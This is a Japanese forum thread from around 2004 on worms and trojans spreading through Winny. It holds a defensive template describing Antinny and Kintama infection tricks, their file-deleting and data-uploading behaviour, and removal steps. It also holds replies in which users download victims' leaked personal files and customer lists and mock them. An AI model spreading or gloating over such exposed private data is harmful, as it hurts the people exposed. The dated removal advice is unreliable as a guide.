【警報】Winnyを狙ったワーム・ウイルス情報 Part30

Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系　・キンタマ系　・batファイル　・スクリーンセーバー　etc

■流行感染パターン
・exeの前にスペースたくさん（例：「秘密の写真.jpg　　　　　　　　　.exe」等）
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part29
http://tmp4.2ch.net/test/read.cgi/download/1098962243/l50

ﾃﾝﾌﾟﾚまとめ　http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/

■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのﾊﾞｰｼﾞｮﾝ】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】

■推奨無視リスト
このままIgnore.txtにコピペしてください。

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。

3げｔ

■感染しないための注意１　〜やっておくべき設定等〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・シングルクリックをダブルクリックにしてうっかり操作防止。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorun(自動実行)は切っておく。(やり方は以下参照)
・適切な無視リストの設定などで、そもそもウイルスを呼び込まない。(リストは以下参照)
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
　(フォルダ名と同じファイルは置けないのである程度防止になる)
・WhiterVBS簡易チェッカーを使う。
　ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
　(拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
　ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
・フォルダアイコン、txtアイコンを標準のものから変更しておく。
　 (アイコンを偽装したexeを見分けるため。aviやヘルプなど他の拡張子も変更が望ましい)
・レジストリ：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
　※アプリケーションのインストール時に弊害が起こることもあるので注意。

■感染しないための注意２　〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
　ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど中身を確認できるアーカイバを使う。
・lzh,zip,rarなど圧縮ファイルは解凍後も要注意。
・exeファイルの実行は完全自己責任。
・CDイメージ(CCD等)はautorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
　ttp://p46.aaacafe.ne.jp/~nydb/

CD/DVDドライブのAutorun(自動実行)の切り方
　◆Win9x、Meの場合
　　1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
　　2.オプション項目の「挿入の自動通知」のチェックを外す
　◆Win2000、XPの場合
　　1.[スタート]−[ファイル名を指定して実行] から regedit を起動
　　2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
　　3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※また窓の手などでソフトでも簡単にオフに出来る。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。

★流行種その１
【キンタマ（W32.AntiWinny.K等）】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ（regedit.exe）を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　に名前xxx データC:\Program Files\xxx\xxx.exeが登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
・etc.(亜種により様々)
■活動内容(亜種毎に違います)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて　[キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh　という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
　(例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
・今回に関わらず、落とした.exeファイルの実行は控える。
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html
★関係ウイルス【苺きんたま（Trojan.Upchan）】
ttp://www.geocities.jp/ichigo_kintama/

★流行種その２
【Antinny.ms（仮称）】
　Antinny.Bの亜種？ サイズ 1.26MB　開発名 SilentToker　Delphi製
　ファイルバージョン5.1.3125.1093　製品バージョン6.00.1800.1007
■症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
　(Systemフォルダにあるsvchost.exeは問題ありません)
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ（ダウン？）フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト（ノートン、バスター）の自動実行を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子はms???.exe(248k)。親はms???.exe(282k)
　(子を消しても、再起動すると親が子を再度作成する)
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応？
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■対策
1. 親のファイル名が含まれるレジストリキーを削除。
　　Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
　　(Win9X、MEの場合は不明)
2. セーフモードで再起動し、親子ともどもファイルを削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
　　HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
　　バスターはPCCTool.exeを使えば再インスコせずに済む。

★流行種その３
【Autorun+bat】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■活動内容(版により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
　(削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)起動をatコマンドでスケジュールする。
・壁紙のエロCGへの変更(画面のプロパティでの修正は不可)
■駆除方法(版により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
・exeの実行は自己責任で行う。あまりアンチウイルスソフトは役に立たない。

★流行種その４
【スクリーンセーバー（仮称）】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染の模様。
■症状(感染確認方法)
・ny起動すると画面が真っ黒になり
　赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャを起動できないようにする。（情報錯綜）
■活動内容
・C:\WINNT\Web\Wallpaperのフォルダが開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り２つの圧縮ファイル作成。
　[任意ﾜｰﾄﾞ][NullPorce] 俺のアドレス帳＆お気に入り　ﾕｰｻﾞｰ名.zip
　私はﾕｰｻﾞｰ名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」ができてる。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe" 22,528Byteができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルを３つ？作る。
・そのexeファイル名はシステムに使用されるものをランダムに使用の模様。
　（報告済み：CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト）
・レジストリに以下を追加し、起動時の自動実行が設定される。
　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下も追加、作用は不明？値はGalaxian Explosion
　HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■対策
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexe削除。
・C:\WINDOWS\bugfix\の中に生成されてる２つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで怪しいキー削除。

過去スレ
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/

12get

ITmedia エンタープライズ：「晒しは一線を越えた」、新種のトロイの木馬Winnyで出回る (1/2)
http://www.itmedia.co.jp/enterprise/articles/0411/05/news089.html

最近 norton2005先生をｲﾝｽｺしたんだが
起動してから操作出来るようになるまで3分くらいかかる様になったんだ。

これってnorton独特の仕様？ちなみにPCスペックは上物。

>>14
スレ違いだ。

>>14
セキュリティ
http://pc5.2ch.net/sec/
ここら辺で探せ。

ITmedia→winnyで落としてみる→感染

感染源は前スレの援交みたいなファイルに混ざってた詰め合わせ
[041106-1346][アニメ][DVD][][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

かりかり言い出してアップフォルダ覘いてみたけど何もなかったけど
winnyのノードリネームして立ち上げてみたらwindows\network\に作られてた。

このファイル以外に何かされてるのかな？

訂正、system32\network

ただのいたずらっぽいな。

マイドキュメント　　　　　　　　　　　　　　　　　　　　.scrと
個人情報22.txtみたいな中開くと個人情報ってひたすら書いてあるテキスト群だったし。

system32を覗いてみたけど、これといって…。

>>19
「マイドキュメント(空白たくさん).scr」の奴は、引っ掛かった奴が必死に
nullpo流して消去させようと無駄なあがきしてるだけでしょ？多分

そんな事より誰か柊のお父さんに教えてあげて下さい。

スレ立て乙

[私には好きな人がいます]
こっちの仙台の詰め合わせ覗いてみた
本人の家族と思われる写真があった　南無

柊の意味を理解した
無知って周りにも迷惑掛けるんだな

仙台を８時間地引したら
１００００ファイルたまりやがった
ファイラー固まったよ

秋穂さん被参照量が多いようで
でも捏造ぽい

naoや、りょう程のインパクトある人っている？

今ンとこ福岡の家具屋さんが激ヤバなんですけど・・・。
本人は自業自得だから兎も角として、顧客のプライバシーダダ漏れですわ・・・。

Shareなら神鳥の落とせば無問題


プw

仙台ギャラクシーエンジェルズ

タマツカさんかな

昨日からShare、Shareうるさいやつがいるが何がしたいんだ...

WindowsXP セットアップ画面のスクリーンショットがあった。

そういえば、りょう巡査って調書が流出した人から損害賠償裁判起こされて
なかったっけ？あれってどうなったの？示談とか？
今回は自営業者っぽいから訴えられたらあぼ〜ん確定だろうな。福岡だし。

share信者と創価って似てるよな

しつこいところとか、空気が読めないとことか、人の不幸を喜ぶとことか

[私には好きな人がいます]のウィルスの情報求む、症状、本体など。

不安になってプロセス見たんだが
\windows\system32\svchost.exeが６つもあった
その中のSYSTEMの一つがメモリをバカに食ってる　12000〜5000くらい

もしかしてやられましたかね、それとも普通ですか？

>36
svchostは複数あるのが普通（私は4つ）。
心配なら、ほかの兆候を調べた方が良い。

もうね釣りとしか思えない

913 名前：[名無し]さん(bin+cue).rar 投稿日：04/11/06 03:51:41 ID:GK9HDpKJ
【仙台ｷﾞｬﾗｸｼｰｴﾝｼﾞｪﾙ（仮称）】
■感染ルート
・主にエロゲのイメージファイルをマウント、オートランでウイルス発動。
■症状(感染確認方法)
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exe追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加し、
　Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
　downフォルダ内のファイル一覧のtxt、デスクトップSS、
　Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・UP時のトリップはユーザー名の模様 。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・CDなどから正常なレジストリエディタに戻す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。
■予防
・exeは踏まない。
・オートランを切る。
・エロゲをマウントしない。

前スレ>>913引用

>>36
それだけじゃわかりません
もっと詳しく書かないとダメデース

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

Shareならトリップ偽装不可、神鳥の落とせば無問題

ププw

ちょっと試しにﾀﾞｳｿしてみた。バスタ2005では検出せず。
フリーのAVGが検出した。

ﾊﾞｽﾀｰ、毎回毎回こういうウイルスの対応遅いじゃん

>>36
svchostぐぐれ

>>43
いいよ、こんなウイルス。対応しなくても。どうせあほ犯罪者以外ひっかからない。

福岡の顧客リストやばくね？
３００人分あるよ

本人の出身校まで分かるし。

やばいっしょ
ってか、人生終わりではないか？

38参照してみたが仙台には感染していない模様　すまんかったサンクス

最近定期的に重くなるのはコレが原因かと思ったが違かったみたいだ
有名所いくつか試したけど引っかからないし
そろそろスレ違いか　ぐぐってくる('A`)ﾉｼ

exeダウンロードせず、nyのGetフォルダにあるexeはすぐに削除
CDのautoranオフ
IE使用せずお気に入り登録もなし
OE使用せずメールデータもなし
デスクトップ・マイドキュメント内もスッカラカン


な漏れは観戦したところでなんの実害もない

仙台ひっかかったー。
でも、症状出てないー

定義ファイルに登録されてなければ引っ掛かるワケないじゃん

>>49
新種はハードディスクにあるファイルから　個人情報がありそうなファイルを全部うｐ

仙台で検索しても何も出てこないよ。エロゲクラスタにしないと駄目とか？

>>53
仙台ギャラクシーエンジェルズ

「大事なのことは、自らに責任を持つこと。」

多○○中学校　同窓生代表のお言葉より

PTAやってる40近いオサーンみたいだし、馬鹿息子がｎｙ使って流出か?

>.55
それ以上書くな
お前が逮捕されたいならかまわんがな。

本当なら笑えないな、怒りの矛先があらぬ方にいって
以前みたいなエロゲ大弾圧が始まるかもね。

この晒しファイルをダウンロードする事は違法なの?

>>49
上2行と感染したところで実害なしは繋がらないぞ

業者から仙台ｷﾞｬﾗｸｼｰｴﾝｼﾞｪﾙ（仮称）の詳細ってまだ出てないの？
itmediaとかじゃなくてセキュリティ専門業者からさ

しかしあまり盛り上がらないな…
なんでだろう？(´･ω･｀)

所詮キンタマの亜種だからだろ、こう言うの嫌だがキンタマの偉大さがよく分かる

苺キンタマがわかりやすい盛り上がりだった
今Winnyを起動してる人間がすくないから森アガランだろ

ITmediaで知って、いまWinnyでギャラ串晒しファイルDL中。
おもしろすぎ！

>>53
感染すると仙台ギャラクシーエンジェルズを無視リストに登録するそうですが･･･。

>>65
いや普段アプリやらないし得ろ動画専門で焙煎とかで繋いでるから。
それでも放置してたら14件ヒットしたよ。
仙台ギャラクシーエンジェルズで繋いでみるよ。うしゃしゃ。

>>65
するどい指摘だｗ

別にクラスタ登録してなくても普通に大量ヒットだったがなぁ。。。

仙台ギャラクシーエンジェル面白いね、みんなwinnyでエロゲしか落とさないって
ことが良く分かった。。。

こ、ここまで来ちゃったら・・・・俺も引っ込みがつかねぇ・・・・

にワタラ

で、グリグリ2は大丈夫なのか？

ギャラクシーエンジェルズがＣＤのオートランで起動するときエロゲのセットアッププログラムも起動するの？

ura氏は全然気がついてないみたいだね。でもおもしろいから
全然良いんだけどね。エロゲやりすぎｗ

晒しはほかでやれ

色々見たが壁紙が赤くなるのは0時を境が多かった希ガス
あと、詰め合わせは便乗で色々入ってるので注意しる

晒しはこちらで
http://sakura02.bbspink.com/test/read.cgi/erolive/1096306691/

（・∀・）ｺﾝﾆﾁﾊ!!

晒しスレどこ？

>>68
勘弁してくれよ、不安になってくるじゃないか〜

なんかキャッシュビューアで見るとわかるらしいよ。
これまた晒し画像で気がついたんだけどｗ

私には好きな人が・・・はエロゲではなく別のが感染元っぽいなあ・・・。

仙台GA踏んじまった・・・

>>81
晒しはいらんがこういう亜種の亜種情報キボー

>>82
アカウント名ｷﾎﾞﾝﾇ

>>79
うちも出ないと思ったらjpg無視してた。

壁紙が赤くなるかどうかは、ウイルスに感染した時に童貞だったかどうかで決まるってゴーダさんが言ってました。

つーか、なんか知り合いいるっぽいから今検証中…
マジならちょっと笑えるな

>>76踏んだらノートンアンチウイルス2000が反応したんだが

>>85
jpg虫ってたorz
きんたまみたいにセットで圧縮だと思ってたよ。
香田の世界へ逝ってきます。

なんか香田氏と同じ名前を使ってるユーザがいてちょっと不謹慎だと思った。
11-01だから本人では絶対無いけど。

晒しとか踏みました報告いいから
何で踏んだからお前ら注意しろよと有意義なの頼む

それわざと香田の名前で流してるだけだろ。
他にも芸能人とかあるな。金正日もキンタマの時あったべ。

>>91
気づいてない人が大半なんじゃないの？
みんな気づき初めてやっと情報が流れるんだと思う。

>88
俺も2003にてアンチが反応あり。

どういうことだ？

>>92
わざと香田の名前で流してるから不謹慎なんだろうが

>>95
＞なんか香田氏と同じ名前を使ってるユーザがいてちょっと不謹慎だと思った。
　同　じ　名　前　を　使　っ　て　る　ユ　ー　ザ　が　い　て

>>88　>>94
ノートンは仙台に対応してるぞ
亜種は知らんがな

なんか厨率高くなったな・・・

>>95-96
わかったから流してくれ頼む

スンマソン

>>98
Tiで発表されたから厨が集まってきてるのだと思うぞ

[041106-0936][MUSIC][MAN][SHIP][私はポート0設定にしております][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

凄いひっかかるな

今のとこ
* [私には好きな人がいます]
* [私はポート0設定にしております]
の文字列を含む、仙台キンタマ亜種（の本体）は発見できてないんだよな
情報求む。　　　　　　　　　　　　　　　　　　　　　　　解析好き

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

Administratorまで流れ出したのが嫌だなあ。

>>104
前スレで特攻レポした者だが
本体は詰め合わせとかにパックされてるのか？

>>104
同じく突撃してみたけど一向に。
あれ、何なんだろ？

　　　 ∩＿＿＿∩　　
　　　 | ノ　　　　　 ヽ　 ??「クマー」･･･なぜ僕の名前が・・　
　　　/　　●　　　● | 　　　　　　
　　 |　　　　( _●_)　 ミ　 　　　
　　彡､　　　|∪|　　､｀＼　 　 　　 　　　
　 /　＿＿　/￣￣￣￣/　ｶﾀｶﾀ･･･ｶﾀ・・・ 　 　　　　　
＿(＿＿＿)/　 IBM 　/＿＿＿＿＿　　　　　
　 　　　＼/＿＿＿＿/　　　　　　 　

>>104
日付は1104以降だから亜種決定じゃないかなとりあえずダウンしてみるかな
てか、容量大きいとかあってスゲー怖いのですが...
ＰＣ死んだら笑ってくれ(;´д｀)
λ............

任しておけ。嘲笑は得意だ。
安心して玉砕して来い。

うちの学校で有名なオタク浅野と思われるｓｓ発見ｗ

>>110だけど
なかなか落ちてこない
プツプツ切れる

浅野さんWDT好きっぽいから許す。

ポート警告大杉になるよ・・・

ネトゲ呼ばれたし
なんか落ちてこないから特攻やめ、
他の人がんばれよー乙

しまつた・・・。

ファイル種別がスクリーンセーバになってるのを見たのに、
フォルダのアイコンと同じアイコンをダブルクリックしてしまっつた。

人間の条件反射とは恐ろしいものですね。
自分だけは騙されないと思ってても騙される。

せめて、Explorerの左のツリービューで開けば・・・。

#まぁいいや、VMwareの捨て環境だから、Undoすりゃいい。

ｱﾝﾄﾞｩってなに？

アンドーナッツの略だろ。

仏語のかけ声、英語の「ﾜﾝﾂｰ」と同義

いや、運動して心を落ち着けようってことだろ。

むしろ遠藤のことだろ

安藤じゃね？

安藤だなｗ

セキュリティ対策企業にとって重要なのは、
あくまで感染者数であり被害の度合いではない。
いくら個人情報晒したりＨＤ全消ししたりしても、
それがちょっとしか感染しないんであれば対策するの面倒なだけ。

逆に、被害はほとんど無くても感染力がすごければ、
それだけたくさんのユーザーがセキュリティ製品を必要とするわけで、
こっちのほうがよっぽど対策のうまみがあるわけだ。

セキュリティーセキュリティーと叫んどいても、
対策企業は結局は金しか考えてないってことだよ。

教育ＴＶで安藤が滑ってるぞ。

お前ら楽しいなぁ。

ブラウザのCookieを根こそぎアーカイブするのは危険だなぁ。
さすがにクレジットカード番号は入ってないだろうけど・・・。

>>125
nyでエロゲDLしてマウントして感染
これはセキュリティ以前の問題だしな

>104
前スレ終盤に貼られていた女性の名前集団の仙台ジェンキンス詰め合わせの中に入ってるよ。

>125
わざわざ長文書かなくていいから
フリーのアンチウィルスでも使っててください

>129
ジェンキンスって何だ俺・・・。

>>130
ていうか分かりきったこと書きすぎだよなｗ

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

.srcの椰子か。アブいな。

>>133
症状詳細きぼん。

scrだし…。

335 名前：324[] 投稿日：04/11/06(土) 21:32:03 ID:WziLdPRU
少し調べてみた
違うかもしれないが[私には好きな人がいます]ウイルスのようです(この名前でいいのか？)

[年月日-時分][クラスタワード][クラスタワード][クラスタワード][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
ってファイル名です。年月日時分とクラスタワードは作成日時とwinny環境によって違うと思う

ITmediaで>>1を紹介しているから逆に被害が拡大しそうな希ガス
ttp://www.itmedia.co.jp/enterprise/articles/0411/05/news089.html

>>331
中身がなかったならよかったね
ただ、ほかの被害はなかったかな？

ギャラ串のjpgが1000超えたｗ

>>136
これ、UpFolder.txtにsystemy32\networkへの道筋をつけるだけで、
そこからが不明。
レジストリとかは無問題。　networkフォルダは空だし。

素朴な疑問なんだが>>133さんが亜種を見つけたとの報告ですが
亜種が出るというのはウイルスが自動に作成するからですか？
それとも誰かが面白半分で手を加えるからですか？

ウイルスが亜種を自動作成したら�dでもない事になるな。
さすがの先生も追いつけないぜ。

エロゲをマウント以外で感染した例って出てる？

>>141
なるほど、ありがとうございます。知識が少し増えたよ！！

>140
別に俺が見つけたわけじゃなくて報告はいくつかあがってたが
俺はおもしろ半分にジェンキンス覘こうとして>>17の時点でかかった。

仕様としてはtxtとかxlsとかjpgとかcokkieをハードディスク内から検索して。パックして
windows\system32にnetworkってフォルダこさえてUPフォルダに登録するくらいだと思う。

だから俺、ジェンキンスじゃねぇって（2回目）orz

naoのときは凄い速度だったのに今回は全然だな
もう本名とか電話番号くらいでは話題にならん。。。

>>133
報告のは、昨夜のうちに解析済み→詳細不明ながらも推定無罪
バックドア仕掛けて何か送ってくるのかな？
仙台キンタマで、ポートサーチしてたのは、その前ふりか？
現在、地引継続中

>>140
亜種は本体を作ったやつが変種として作成、あるいは、誰かが手を加える
今のとこ、自動生成タイプは未発見
（そこまでのスキルがないのか？、必要性がないのか、あるいは自分が踏む危険性を考えてか）

壁紙をｸﾞﾛにするのとかでたら嫌だな・・

>>144のは
マイドキュメント フォルダ偽装の.scr（スクリーンセーバの拡張子、実行形式）
で、CRC32がD10645C6のヤツだよな？ うちのテスト環境では発動しないけど、なんか条件あんのかな

>>148
あるじゃん既に。

ノートンでウィルスチェックかけると、致命的エラーでスキャンできませんでした
といわれたんだが、こりゃウイルスにやられたんかな？

（・∀・）ﾆﾔﾆﾔ

前スレより
623 名前： [名無し]さん(bin+cue).rar [sage] 投稿日： 04/11/04 01:42:23 ID:WaxmylIR
物凄く馬鹿な質問かもしれないけど、
Autorun切っておけばマウント→即ウィルス活動開始ってことはなくても、
そのｴﾛｹﾞなりなんなりをインスコしようとしたら、結局setup.exeを起動しなくちゃいけないわけで、
そうなるとAutorun切る意味っていったい何？
624 名前： [名無し]さん(bin+cue).rar [sage] 投稿日： 04/11/04 01:43:56 ID:j3xUYUqc
>>623
そのsetup.exeを検査する余裕があるでしょう

テンプレの対策をしている程度の知識しかないけど
setup.exeを検査するってのは難しい？

一番面白かったやしの情報ｷﾎﾞﾝ

>>137
に感染している奴のまとめファイルより

UpFolder.txt
[network]
Path=C:\WINDOWS\system32\network
Trip=

アンチウィルスソフトに任せれば。
対応してる奴には対応できるけど。

安全が確認されてるのだけ落とせば一応は大丈夫

過去に猛威を振るったウィルスの単体をターゲットとした除去キットのReadme.txtがあってﾜﾛﾀ。
しかも、何種類も。

おまえさん、何度も感染してるのね・・・

犯罪やめればいいんだよｗ

個人情報晒されたあげく、
著作権団体から民事の損害賠償を
ｳﾝ百万ぐらい起こされて、親から勘当される奴とか出ないかな。
爆笑できるのに。

>>155
ここまでは確認。
さらに、ｎｙにつなげっ放しにしてあるんだけど進展なし。

>>159
落としたのがエロゲなら完璧だな。

改めてエロの力は凄いと再認識したよ・・・

>>159
トロイ踏んで個人情報が漏れ、そこから手繰られた場合、犯罪行為の証拠となりえるかどうか？
という問題がある。ので、怪しいことしてる香具師はとりあえず踏んでおけ(w
民事の場合は特にそう。告訴する側がトロイ流してる謎団体の所業まで突き止めないとね。

いずれにしろ、漏れは好奇心で新型トロイの動向を知りたいだけなのだが
（そういう意味でnyは、いい漁場だな）

エロのおかげでWindowsが大きくなったんじゃなかったっけ？

とりあえずｴﾛのおかげでビデオは普及したけっか

エロで大きくなるのは一箇所だけでいい

>>122
もまえのボケは高度だな

まぁエロのおかげで人類が繁栄したのは間違いないな。

エロ・エネルギーが推進したもの

VHS（ビデオ）、CD（VideoCD、CD-R）、DVD（DVD±R）、
IE（Webブラウザ）→Internet→Windows、しいてはPC全体
人類。

エロのお陰で性犯罪も耐えないけどな。
